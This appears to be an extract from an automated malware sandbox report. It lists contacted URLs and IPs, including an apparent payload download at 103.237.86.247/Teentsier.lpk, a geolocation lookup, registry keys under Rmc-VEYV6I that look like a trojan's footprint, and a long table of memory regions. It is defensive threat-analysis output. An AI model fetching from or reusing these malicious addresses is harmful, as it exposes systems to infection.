|
unknown
|
||
|
http://103.237.86.247/Teent
|
unknown
|
||
|
http://www.nirsoft.net/
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://103.237H
|
unknown
|
||
|
http://103.237.86.247/Te
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
http://geoplugin.net/json.gpj
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
http://geoplugin.net/json.gpi
|
unknown
|
||
|
http://www.imvu.com
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://103.237.86.2
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://103.237.86.247/
|
unknown
|
||
|
http://geoplugin.net/json.gp
|
178.237.33.50
|
||
|
http://103.237.86.24
|
unknown
|
||
|
http://103.237.86.247/Tee
|
unknown
|
||
|
http://103.237.86.247/Teentsier.
|
unknown
|
||
|
http://103.237.86.247/Teentsier.lpkXR
|
unknown
|
||
|
https://www.google.com/accounts/servicelogin
|
unknown
|
||
|
http://103.237.86.247/Teentsier.lpk
|
103.237.86.247
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://103.23
|
unknown
|
||
|
http://103.237.86.247/Teentsier.l
|
unknown
|
||
|
http://www.ebuddy.com
|
unknown
|
There are 45 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
geoplugin.net
|
178.237.33.50
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
103.237.87.32
|
unknown
|
unknown
|
|
|
|
178.237.33.50
|
geoplugin.net
|
Netherlands
|
||
|
103.237.86.247
|
unknown
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-VEYV6I
|
exepath
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-VEYV6I
|
licence
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-VEYV6I
|
time
|
There are 7 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
8AF4000
|
heap
|
page read and write
|
|
|
|
5B84000
|
trusted library allocation
|
page read and write
|
|
|
|
BAFD000
|
direct allocation
|
page execute and read and write
|
|
|
|
327F000
|
stack
|
page read and write
|
|
|
|
19E90070000
|
trusted library allocation
|
page read and write
|
|
|
|
8B0E000
|
heap
|
page read and write
|
|
|
|
88B0000
|
direct allocation
|
page execute and read and write
|
|
|
|
70241000
|
unkown
|
page execute read
|
||
|
2EF8000
|
heap
|
page read and write
|
||
|
878E000
|
stack
|
page read and write
|
||
|
29D2A54E000
|
heap
|
page read and write
|
||
|
4B15000
|
heap
|
page read and write
|
||
|
29D2C485000
|
heap
|
page read and write
|
||
|
29D2C482000
|
heap
|
page read and write
|
||
|
4B15000
|
heap
|
page read and write
|
||
|
19E80894000
|
trusted library allocation
|
page read and write
|
||
|
2F68000
|
heap
|
page read and write
|
||
|
29D2C496000
|
heap
|
page read and write
|
||
|
29D2C496000
|
heap
|
page read and write
|
||
|
77D0000
|
trusted library allocation
|
page read and write
|
||
|
8890000
|
trusted library allocation
|
page read and write
|
||
|
2FC2000
|
trusted library allocation
|
page read and write
|
||
|
2E44000
|
heap
|
page read and write
|
||
|
2984000
|
heap
|
page read and write
|
||
|
8B4E000
|
heap
|
page read and write
|
||
|
244CE000
|
stack
|
page read and write
|
||
|
7810000
|
trusted library allocation
|
page read and write
|
||
|
29D2C531000
|
heap
|
page read and write
|
||
|
4B01000
|
heap
|
page read and write
|
||
|
7FFAACD50000
|
trusted library allocation
|
page execute and read and write
|
||
|
8C80000
|
direct allocation
|
page read and write
|
||
|
510A000
|
heap
|
page read and write
|
||
|
5108000
|
heap
|
page read and write
|
||
|
4B0F000
|
heap
|
page read and write
|
||
|
88A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACF00000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1E3C2000
|
unkown
|
page readonly
|
||
|
2C20000
|
heap
|
page read and write
|
||
|
6EE0000
|
direct allocation
|
page read and write
|
||
|
29D2BF1E000
|
heap
|
page read and write
|
||
|
24A96000
|
unclassified section
|
page execute and read and write
|
||
|
5108000
|
heap
|
page read and write
|
||
|
B0FD000
|
direct allocation
|
page execute and read and write
|
||
|
5126000
|
heap
|
page read and write
|
||
|
29D2C4A3000
|
heap
|
page read and write
|
||
|
4B0D000
|
heap
|
page read and write
|
||
|
2C3F000
|
heap
|
page read and write
|
||
|
6F10000
|
direct allocation
|
page read and write
|
||
|
8B3F000
|
heap
|
page read and write
|
||
|
8920000
|
trusted library allocation
|
page execute and read and write
|
||
|
2984000
|
heap
|
page read and write
|
||
|
240EE000
|
stack
|
page read and write
|
||
|
2FB0000
|
trusted library allocation
|
page read and write
|
||
|
7750000
|
trusted library allocation
|
page execute and read and write
|
||
|
19E90001000
|
trusted library allocation
|
page read and write
|
||
|
739B000
|
heap
|
page read and write
|
||
|
29D2A480000
|
heap
|
page read and write
|
||
|
513F000
|
heap
|
page read and write
|
||
|
4B00000
|
heap
|
page read and write
|
||
|
19E902F9000
|
trusted library allocation
|
page read and write
|
||
|
4B18000
|
heap
|
page read and write
|
||
|
7FFB1E3A1000
|
unkown
|
page execute read
|
||
|
29D2C4B4000
|
heap
|
page read and write
|
||
|
2E44000
|
heap
|
page read and write
|
||
|
8B6F000
|
heap
|
page read and write
|
||
|
29D2C531000
|
heap
|
page read and write
|
||
|
19EF3C30000
|
heap
|
page read and write
|
||
|
9B0000
|
heap
|
page read and write
|
||
|
2FC5000
|
trusted library allocation
|
page execute and read and write
|
||
|
511C000
|
heap
|
page read and write
|
||
|
5108000
|
heap
|
page read and write
|
||
|
2BBC000
|
stack
|
page read and write
|
||
|
4B37000
|
heap
|
page read and write
|
||
|
19EF5CF6000
|
heap
|
page read and write
|
||
|
2984000
|
heap
|
page read and write
|
||
|
19E80088000
|
trusted library allocation
|
page read and write
|
||
|
8B22000
|
heap
|
page read and write
|
||
|
5B7E000
|
trusted library allocation
|
page read and write
|
||
|
2910000
|
heap
|
page read and write
|
||
|
144A5FE000
|
stack
|
page read and write
|
||
|
19EF3E88000
|
heap
|
page read and write
|
||
|
328C000
|
heap
|
page read and write
|
||
|
29D2C482000
|
heap
|
page read and write
|
||
|
2EEF000
|
stack
|
page read and write
|
||
|
29D2C446000
|
heap
|
page read and write
|
||
|
29D2C48E000
|
heap
|
page read and write
|
||
|
870C000
|
stack
|
page read and write
|
||
|
3000000
|
trusted library allocation
|
page execute and read and write
|
||
|
2F94000
|
trusted library allocation
|
page read and write
|
||
|
4FF7000
|
heap
|
page read and write
|
||
|
4B15000
|
heap
|
page read and write
|
||
|
4B00000
|
heap
|
page read and write
|
||
|
2E45000
|
heap
|
page read and write
|
||
|
19EF3DE0000
|
heap
|
page read and write
|
||
|
77B0000
|
trusted library allocation
|
page read and write
|
||
|
29D2A755000
|
heap
|
page read and write
|
||
|
7FFAACE90000
|
trusted library allocation
|
page read and write
|
||
|
2984000
|
heap
|
page read and write
|
||
|
4B15000
|
heap
|
page read and write
|
||
|
8CC0000
|
direct allocation
|
page read and write
|
||
|
5166000
|
heap
|
page read and write
|
||
|
2469A000
|
heap
|
page read and write
|
||
|
7FFAACED0000
|
trusted library allocation
|
page read and write
|
||
|
70256000
|
unkown
|
page readonly
|
||
|
3280000
|
heap
|
page read and write
|
||
|
321A000
|
heap
|
page read and write
|
||
|
4B00000
|
heap
|
page read and write
|
||
|
2495B000
|
heap
|
page read and write
|
||
|
4B18000
|
heap
|
page read and write
|
||
|
5166000
|
heap
|
page read and write
|
||
|
4B15000
|
heap
|
page read and write
|
||
|
2B5F000
|
unkown
|
page read and write
|
||
|
5105000
|
heap
|
page read and write
|
||
|
8B31000
|
heap
|
page read and write
|
||
|
3210000
|
heap
|
page read and write
|
||
|
29D2C496000
|
heap
|
page read and write
|
||
|
4B1A000
|
heap
|
page read and write
|
||
|
2980000
|
heap
|
page read and write
|
||
|
8B22000
|
heap
|
page read and write
|
||
|
456000
|
system
|
page execute and read and write
|
||
|
248B3000
|
heap
|
page read and write
|
||
|
5111000
|
heap
|
page read and write
|
||
|
249BE000
|
heap
|
page read and write
|
||
|
63AD000
|
remote allocation
|
page execute and read and write
|
||
|
8B31000
|
heap
|
page read and write
|
||
|
2984000
|
heap
|
page read and write
|
||
|
73A1000
|
heap
|
page read and write
|
||
|
2F7D000
|
heap
|
page read and write
|
||
|
306C000
|
heap
|
page read and write
|
||
|
2D90000
|
heap
|
page read and write
|
||
|
7FFAACD72000
|
trusted library allocation
|
page read and write
|
||
|
144B54D000
|
stack
|
page read and write
|
||
|
29D2A5A1000
|
heap
|
page read and write
|
||
|
12673850000
|
heap
|
page read and write
|
||
|
48AC000
|
stack
|
page read and write
|
||
|
144A47E000
|
stack
|
page read and write
|
||
|
8200000
|
heap
|
page read and write
|
||
|
29D2C477000
|
heap
|
page read and write
|
||
|
4B01000
|
heap
|
page read and write
|
||
|
75F0000
|
direct allocation
|
page read and write
|
||
|
8870000
|
trusted library allocation
|
page read and write
|
||
|
8B31000
|
heap
|
page read and write
|
||
|
510F000
|
heap
|
page read and write
|
||
|
473000
|
system
|
page execute and read and write
|
||
|
8A25000
|
heap
|
page read and write
|
||
|
29D2A5BD000
|
heap
|
page read and write
|
||
|
6F8E000
|
stack
|
page read and write
|
||
|
144A97E000
|
stack
|
page read and write
|
||
|
1449FFF000
|
stack
|
page read and write
|
||
|
5119000
|
heap
|
page read and write
|
||
|
19EF5F7B000
|
heap
|
page read and write
|
||
|
2F79000
|
heap
|
page read and write
|
||
|
8210000
|
trusted library allocation
|
page execute and read and write
|
||
|
4B05000
|
heap
|
page read and write
|
||
|
5101000
|
heap
|
page read and write
|
||
|
8B26000
|
heap
|
page read and write
|
||
|
9230000
|
direct allocation
|
page execute and read and write
|
||
|
22FFBFF000
|
unkown
|
page read and write
|
||
|
24A9C000
|
unclassified section
|
page execute and read and write
|
||
|
5100000
|
trusted library allocation
|
page read and write
|
||
|
8B22000
|
heap
|
page read and write
|
||
|
7FFAACBA0000
|
trusted library allocation
|
page read and write
|
||
|
4B11000
|
heap
|
page read and write
|
||
|
2419F000
|
stack
|
page read and write
|
||
|
6CF0000
|
heap
|
page execute and read and write
|
||
|
19EF5FB7000
|
heap
|
page read and write
|
||
|
4B09000
|
heap
|
page read and write
|
||
|
5166000
|
heap
|
page read and write
|
||
|
83EF000
|
heap
|
page read and write
|
||
|
23FAE000
|
stack
|
page read and write
|
||
|
7FFAACEF0000
|
trusted library allocation
|
page read and write
|
||
|
29D2A53F000
|
heap
|
page read and write
|
||
|
5000000
|
heap
|
page read and write
|
||
|
7780000
|
trusted library allocation
|
page read and write
|
||
|
2984000
|
heap
|
page read and write
|
||
|
735E000
|
stack
|
page read and write
|
||
|
7FFB1E3A1000
|
unkown
|
page execute read
|
||
|
28DA000
|
stack
|
page read and write
|
||
|
5166000
|
heap
|
page read and write
|
||
|
7FFAACEB0000
|
trusted library allocation
|
page read and write
|
||
|
511C000
|
heap
|
page read and write
|
||
|
19EF3F60000
|
heap
|
page read and write
|
||
|
29D2A52C000
|
heap
|
page read and write
|
||
|
144A37E000
|
stack
|
page read and write
|
||
|
19E81906000
|
trusted library allocation
|
page read and write
|
||
|
29D2C51D000
|
heap
|
page read and write
|
||
|
4B0D000
|
heap
|
page read and write
|
||
|
8BAE000
|
heap
|
page read and write
|
||
|
2B90000
|
heap
|
page read and write
|
||
|
2448F000
|
stack
|
page read and write
|
||
|
4B0D000
|
heap
|
page read and write
|
||
|
5101000
|
heap
|
page read and write
|
||
|
92FD000
|
direct allocation
|
page execute and read and write
|
||
|
247C1000
|
heap
|
page read and write
|
||
|
323D000
|
stack
|
page read and write
|
||
|
31A0000
|
heap
|
page read and write
|
||
|
510A000
|
heap
|
page read and write
|
||
|
4B18000
|
heap
|
page read and write
|
||
|
8BAE000
|
heap
|
page read and write
|
||
|
2E80000
|
heap
|
page read and write
|
||
|
2DC7000
|
heap
|
page read and write
|
||
|
2406B000
|
stack
|
page read and write
|
||
|
2E44000
|
heap
|
page read and write
|
||
|
29D2A592000
|
heap
|
page read and write
|
||
|
8880000
|
trusted library allocation
|
page read and write
|
||
|
8AB0000
|
heap
|
page read and write
|
||
|
4B18000
|
heap
|
page read and write
|
||
|
82F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
510A000
|
heap
|
page read and write
|
||
|
19EF3E23000
|
heap
|
page read and write
|
||
|
12673A84000
|
heap
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
29D2C458000
|
heap
|
page read and write
|
||
|
2472D000
|
heap
|
page read and write
|
||
|
5300000
|
trusted library allocation
|
page read and write
|
||
|
4B01000
|
heap
|
page read and write
|
||
|
2F30000
|
heap
|
page read and write
|
||
|
484F000
|
stack
|
page read and write
|
||
|
31B0000
|
heap
|
page read and write
|
||
|
29D2A5F2000
|
heap
|
page read and write
|
||
|
19E80843000
|
trusted library allocation
|
page read and write
|
||
|
29D2A539000
|
heap
|
page read and write
|
||
|
510F000
|
heap
|
page read and write
|
||
|
2FF3000
|
heap
|
page read and write
|
||
|
29D2A5F7000
|
heap
|
page read and write
|
||
|
7800000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
29D2A532000
|
heap
|
page read and write
|
||
|
5166000
|
heap
|
page read and write
|
||
|
29D2BF0F000
|
heap
|
page read and write
|
||
|
4B18000
|
heap
|
page read and write
|
||
|
4C2F000
|
stack
|
page read and write
|
||
|
7FFAACD41000
|
trusted library allocation
|
page read and write
|
||
|
2E44000
|
heap
|
page read and write
|
||
|
19EF3D9F000
|
heap
|
page read and write
|
||
|
83E3000
|
heap
|
page read and write
|
||
|
45C000
|
system
|
page execute and read and write
|
||
|
5166000
|
heap
|
page read and write
|
||
|
2430D000
|
stack
|
page read and write
|
||
|
29D2A586000
|
heap
|
page read and write
|
||
|
5108000
|
heap
|
page read and write
|
||
|
A6FD000
|
direct allocation
|
page execute and read and write
|
||
|
19E8190A000
|
trusted library allocation
|
page read and write
|
||
|
4B18000
|
heap
|
page read and write
|
||
|
29D2C010000
|
remote allocation
|
page read and write
|
||
|
8B22000
|
heap
|
page read and write
|
||
|
731E000
|
stack
|
page read and write
|
||
|
7600000
|
direct allocation
|
page read and write
|
||
|
5166000
|
heap
|
page read and write
|
||
|
29D2A5CA000
|
heap
|
page read and write
|
||
|
29D2A531000
|
heap
|
page read and write
|
||
|
83A0000
|
heap
|
page read and write
|
||
|
690E000
|
stack
|
page read and write
|
||
|
4B18000
|
heap
|
page read and write
|
||
|
6CF5000
|
heap
|
page execute and read and write
|
||
|
5141000
|
heap
|
page read and write
|
||
|
510F000
|
heap
|
page read and write
|
||
|
5101000
|
heap
|
page read and write
|
||
|
28FD000
|
stack
|
page read and write
|
||
|
29D2A59D000
|
heap
|
page read and write
|
||
|
6F00000
|
direct allocation
|
page read and write
|
||
|
2E44000
|
heap
|
page read and write
|
||
|
4B09000
|
heap
|
page read and write
|
||
|
5166000
|
heap
|
page read and write
|
||
|
7790000
|
trusted library allocation
|
page read and write
|
||
|
4B0D000
|
heap
|
page read and write
|
||
|
249BE000
|
heap
|
page read and write
|
||
|
773D000
|
stack
|
page read and write
|
||
|
45AD000
|
remote allocation
|
page execute and read and write
|
||
|
8B6F000
|
heap
|
page read and write
|
||
|
29D2BF1B000
|
heap
|
page read and write
|
||
|
29D2C482000
|
heap
|
page read and write
|
||
|
D6CFAFB000
|
stack
|
page read and write
|
||
|
4B15000
|
heap
|
page read and write
|
||
|
19E80001000
|
trusted library allocation
|
page read and write
|
||
|
29D2C534000
|
heap
|
page read and write
|
||
|
29D2C549000
|
heap
|
page read and write
|
||
|
29D2A5C6000
|
heap
|
page read and write
|
||
|
2FE0000
|
trusted library allocation
|
page read and write
|
||
|
593B000
|
trusted library allocation
|
page read and write
|
||
|
29D2A538000
|
heap
|
page read and write
|
||
|
8395000
|
heap
|
page read and write
|
||
|
5166000
|
heap
|
page read and write
|
||
|
5101000
|
heap
|
page read and write
|
||
|
29D2A592000
|
heap
|
page read and write
|
||
|
8A20000
|
heap
|
page read and write
|
||
|
2A50000
|
heap
|
page read and write
|
||
|
3219000
|
heap
|
page read and write
|
||
|
5100000
|
heap
|
page read and write
|
||
|
19EF5E20000
|
heap
|
page read and write
|
||
|
19EF5750000
|
trusted library allocation
|
page read and write
|
||
|
29D2C476000
|
heap
|
page read and write
|
||
|
4B01000
|
heap
|
page read and write
|
||
|
29D2C552000
|
heap
|
page read and write
|
||
|
8B22000
|
heap
|
page read and write
|
||
|
4B1A000
|
heap
|
page read and write
|
||
|
4B01000
|
heap
|
page read and write
|
||
|
4B0E000
|
heap
|
page read and write
|
||
|
7F910000
|
trusted library allocation
|
page execute and read and write
|
||
|
19E80877000
|
trusted library allocation
|
page read and write
|
||
|
73BF000
|
heap
|
page read and write
|
||
|
29D2C4CB000
|
heap
|
page read and write
|
||
|
2FBA000
|
trusted library allocation
|
page execute and read and write
|
||
|
2402D000
|
stack
|
page read and write
|
||
|
12673A50000
|
heap
|
page read and write
|
||
|
2A30000
|
heap
|
page read and write
|
||
|
7740000
|
trusted library allocation
|
page read and write
|
||
|
8CA0000
|
direct allocation
|
page read and write
|
||
|
29D2C431000
|
heap
|
page read and write
|
||
|
2F50000
|
trusted library section
|
page read and write
|
||
|
4B0F000
|
heap
|
page read and write
|
||
|
4F12000
|
trusted library allocation
|
page read and write
|
||
|
19EF3DDE000
|
heap
|
page read and write
|
||
|
19EF3E21000
|
heap
|
page read and write
|
||
|
29D2A59B000
|
heap
|
page read and write
|
||
|
6DBE000
|
stack
|
page read and write
|
||
|
7380000
|
heap
|
page read and write
|
||
|
29CE000
|
stack
|
page read and write
|
||
|
29D2C010000
|
remote allocation
|
page read and write
|
||
|
74D1000
|
heap
|
page read and write
|
||
|
5166000
|
heap
|
page read and write
|
||
|
29D2C4AF000
|
heap
|
page read and write
|
||
|
6E8D000
|
stack
|
page read and write
|
||
|
29D2BF1E000
|
heap
|
page read and write
|
||
|
C4FD000
|
direct allocation
|
page execute and read and write
|
||
|
29D2BF06000
|
heap
|
page read and write
|
||
|
144B4CE000
|
stack
|
page read and write
|
||
|
5141000
|
heap
|
page read and write
|
||
|
5166000
|
heap
|
page read and write
|
||
|
D6CFEFB000
|
stack
|
page read and write
|
||
|
19E81E2F000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACB90000
|
trusted library allocation
|
page read and write
|
||
|
24A1D000
|
unclassified section
|
page execute and read and write
|
||
|
2950000
|
heap
|
page readonly
|
||
|
29D2A75A000
|
heap
|
page read and write
|
||
|
144B5CB000
|
stack
|
page read and write
|
||
|
4B0E000
|
heap
|
page read and write
|
||
|
29D2BF17000
|
heap
|
page read and write
|
||
|
4B15000
|
heap
|
page read and write
|
||
|
4B18000
|
heap
|
page read and write
|
||
|
7770000
|
trusted library allocation
|
page read and write
|
||
|
2C3A000
|
heap
|
page read and write
|
||
|
24A19000
|
unclassified section
|
page execute and read and write
|
||
|
8D10000
|
direct allocation
|
page read and write
|
||
|
5138000
|
heap
|
page read and write
|
||
|
87CE000
|
stack
|
page read and write
|
||
|
4AE1000
|
heap
|
page read and write
|
||
|
4B18000
|
heap
|
page read and write
|
||
|
249BB000
|
heap
|
page read and write
|
||
|
19EF5DF0000
|
heap
|
page execute and read and write
|
||
|
29D2A75B000
|
heap
|
page read and write
|
||
|
4B1A000
|
heap
|
page read and write
|
||
|
144A2FE000
|
stack
|
page read and write
|
||
|
2E44000
|
heap
|
page read and write
|
||
|
29D2C496000
|
heap
|
page read and write
|
||
|
5109000
|
heap
|
page read and write
|
||
|
2455B000
|
unclassified section
|
page execute and read and write
|
||
|
2FF0000
|
heap
|
page read and write
|
||
|
4B18000
|
heap
|
page read and write
|
||
|
19EF5FAE000
|
heap
|
page read and write
|
||
|
29D2C467000
|
heap
|
page read and write
|
||
|
4AE0000
|
heap
|
page read and write
|
||
|
29D2A5F7000
|
heap
|
page read and write
|
||
|
83E7000
|
heap
|
page read and write
|
||
|
4C1E000
|
stack
|
page read and write
|
||
|
29D2BF01000
|
heap
|
page read and write
|
||
|
5166000
|
heap
|
page read and write
|
||
|
144AA7E000
|
stack
|
page read and write
|
||
|
29D2BF01000
|
heap
|
page read and write
|
||
|
29D2C53F000
|
heap
|
page read and write
|
||
|
58F9000
|
trusted library allocation
|
page read and write
|
||
|
2ECD000
|
stack
|
page read and write
|
||
|
19E8067B000
|
trusted library allocation
|
page read and write
|
||
|
767E000
|
stack
|
page read and write
|
||
|
5108000
|
heap
|
page read and write
|
||
|
19EF3EF0000
|
heap
|
page readonly
|
||
|
4B18000
|
heap
|
page read and write
|
||
|
81AD000
|
remote allocation
|
page execute and read and write
|
||
|
5166000
|
heap
|
page read and write
|
||
|
19E80742000
|
trusted library allocation
|
page read and write
|
||
|
2438F000
|
stack
|
page read and write
|
||
|
2984000
|
heap
|
page read and write
|
||
|
29D2C472000
|
heap
|
page read and write
|
||
|
4B1A000
|
heap
|
page read and write
|
||
|
2984000
|
heap
|
page read and write
|
||
|
8390000
|
heap
|
page read and write
|
||
|
12673A90000
|
heap
|
page read and write
|
||
|
510F000
|
heap
|
page read and write
|
||
|
249C0000
|
unclassified section
|
page execute and read and write
|
||
|
4B18000
|
heap
|
page read and write
|
||
|
7FFAACC40000
|
trusted library allocation
|
page read and write
|
||
|
8EC000
|
stack
|
page read and write
|
||
|
19E812A6000
|
trusted library allocation
|
page read and write
|
||
|
928000
|
stack
|
page read and write
|
||
|
29D2A586000
|
heap
|
page read and write
|
||
|
2E16000
|
heap
|
page read and write
|
||
|
8B66000
|
heap
|
page read and write
|
||
|
7FFAACB92000
|
trusted library allocation
|
page read and write
|
||
|
2E20000
|
heap
|
page read and write
|
||
|
4B18000
|
heap
|
page read and write
|
||
|
5166000
|
heap
|
page read and write
|
||
|
19EF3EE0000
|
heap
|
page execute and read and write
|
||
|
29D2BF01000
|
heap
|
page read and write
|
||
|
29D2C467000
|
heap
|
page read and write
|
||
|
97E000
|
heap
|
page read and write
|
||
|
12673A30000
|
heap
|
page read and write
|
||
|
19E8022A000
|
trusted library allocation
|
page read and write
|
||
|
8D20000
|
heap
|
page read and write
|
||
|
8B32000
|
heap
|
page read and write
|
||
|
2E45000
|
heap
|
page read and write
|
||
|
4B18000
|
heap
|
page read and write
|
||
|
7025D000
|
unkown
|
page read and write
|
||
|
29D2C5E5000
|
heap
|
page read and write
|
||
|
19E81F34000
|
trusted library allocation
|
page read and write
|
||
|
19EF3F70000
|
heap
|
page read and write
|
||
|
8B3F000
|
heap
|
page read and write
|
||
|
2BCC000
|
stack
|
page read and write
|
||
|
5166000
|
heap
|
page read and write
|
||
|
5166000
|
heap
|
page read and write
|
||
|
29D2C459000
|
heap
|
page read and write
|
||
|
19EF6290000
|
heap
|
page read and write
|
||
|
76FE000
|
stack
|
page read and write
|
||
|
4B0D000
|
heap
|
page read and write
|
||
|
511F000
|
heap
|
page read and write
|
||
|
7620000
|
trusted library allocation
|
page read and write
|
||
|
6ECB000
|
stack
|
page read and write
|
||
|
7DF4A9D40000
|
trusted library allocation
|
page execute and read and write
|
||
|
19E90021000
|
trusted library allocation
|
page read and write
|
||
|
8C90000
|
direct allocation
|
page read and write
|
||
|
7FFAACD30000
|
trusted library allocation
|
page read and write
|
||
|
5166000
|
heap
|
page read and write
|
||
|
23FEF000
|
stack
|
page read and write
|
||
|
7FFAACE40000
|
trusted library allocation
|
page read and write
|
||
|
19EF5CF0000
|
heap
|
page read and write
|
||
|
7FFAACD60000
|
trusted library allocation
|
page execute and read and write
|
||
|
76BF000
|
stack
|
page read and write
|
||
|
2984000
|
heap
|
page read and write
|
||
|
8B35000
|
heap
|
page read and write
|
||
|
4B09000
|
heap
|
page read and write
|
||
|
29D2C0E0000
|
heap
|
page read and write
|
||
|
7610000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1E3A0000
|
unkown
|
page readonly
|
||
|
19EF5E40000
|
heap
|
page read and write
|
||
|
5166000
|
heap
|
page read and write
|
||
|
5166000
|
heap
|
page read and write
|
||
|
7FFAACE30000
|
trusted library allocation
|
page read and write
|
||
|
2E45000
|
heap
|
page read and write
|
||
|
29D2A5BB000
|
heap
|
page read and write
|
||
|
7FFAACE50000
|
trusted library allocation
|
page read and write
|
||
|
2DCF000
|
stack
|
page read and write
|
||
|
4B0F000
|
heap
|
page read and write
|
||
|
7FFAACEA0000
|
trusted library allocation
|
page read and write
|
||
|
2D9F000
|
heap
|
page read and write
|
||
|
82E0000
|
heap
|
page read and write
|
||
|
25AD000
|
stack
|
page read and write
|
||
|
8B31000
|
heap
|
page read and write
|
||
|
19EF3F00000
|
trusted library allocation
|
page read and write
|
||
|
512D000
|
heap
|
page read and write
|
||
|
2F50000
|
heap
|
page readonly
|
||
|
7FFAACEE0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACC76000
|
trusted library allocation
|
page execute and read and write
|
||
|
5166000
|
heap
|
page read and write
|
||
|
2C51000
|
heap
|
page read and write
|
||
|
8CE0000
|
direct allocation
|
page read and write
|
||
|
97A000
|
heap
|
page read and write
|
||
|
4B01000
|
heap
|
page read and write
|
||
|
249BE000
|
heap
|
page read and write
|
||
|
144A57E000
|
stack
|
page read and write
|
||
|
19E81900000
|
trusted library allocation
|
page read and write
|
||
|
4F30000
|
trusted library allocation
|
page read and write
|
||
|
4B0D000
|
heap
|
page read and write
|
||
|
7FFAACEC0000
|
trusted library allocation
|
page read and write
|
||
|
4FAD000
|
remote allocation
|
page execute and read and write
|
||
|
5166000
|
heap
|
page read and write
|
||
|
83F7000
|
heap
|
page read and write
|
||
|
8860000
|
trusted library allocation
|
page read and write
|
||
|
2EF0000
|
heap
|
page read and write
|
||
|
2E40000
|
heap
|
page read and write
|
||
|
8850000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAACDF0000
|
trusted library allocation
|
page read and write
|
||
|
29D2C467000
|
heap
|
page read and write
|
||
|
5166000
|
heap
|
page read and write
|
||
|
4B18000
|
heap
|
page read and write
|
||
|
8220000
|
trusted library allocation
|
page read and write
|
||
|
29D2A532000
|
heap
|
page read and write
|
||
|
29D2C430000
|
heap
|
page read and write
|
||
|
4B15000
|
heap
|
page read and write
|
||
|
4B08000
|
heap
|
page read and write
|
||
|
241A0000
|
heap
|
page read and write
|
||
|
29D2A590000
|
heap
|
page read and write
|
||
|
4F20000
|
heap
|
page read and write
|
||
|
144A273000
|
stack
|
page read and write
|
||
|
512F000
|
heap
|
page read and write
|
||
|
7FFAACC50000
|
trusted library allocation
|
page execute and read and write
|
||
|
D6CF6FE000
|
stack
|
page read and write
|
||
|
289C000
|
stack
|
page read and write
|
||
|
5166000
|
heap
|
page read and write
|
||
|
4B18000
|
heap
|
page read and write
|
||
|
24621000
|
heap
|
page read and write
|
||
|
19EF5F4D000
|
heap
|
page read and write
|
||
|
7FFB1E3C0000
|
unkown
|
page read and write
|
||
|
5126000
|
heap
|
page read and write
|
||
|
75D0000
|
direct allocation
|
page read and write
|
||
|
3217000
|
heap
|
page read and write
|
||
|
5166000
|
heap
|
page read and write
|
||
|
29D2C446000
|
heap
|
page read and write
|
||
|
4B0F000
|
heap
|
page read and write
|
||
|
29D2C5DB000
|
heap
|
page read and write
|
||
|
2F60000
|
heap
|
page readonly
|
||
|
7FFB1E3A0000
|
unkown
|
page readonly
|
||
|
77F0000
|
trusted library allocation
|
page read and write
|
||
|
4B15000
|
heap
|
page read and write
|
||
|
24A40000
|
unclassified section
|
page execute and read and write
|
||
|
2E44000
|
heap
|
page read and write
|
||
|
5166000
|
heap
|
page read and write
|
||
|
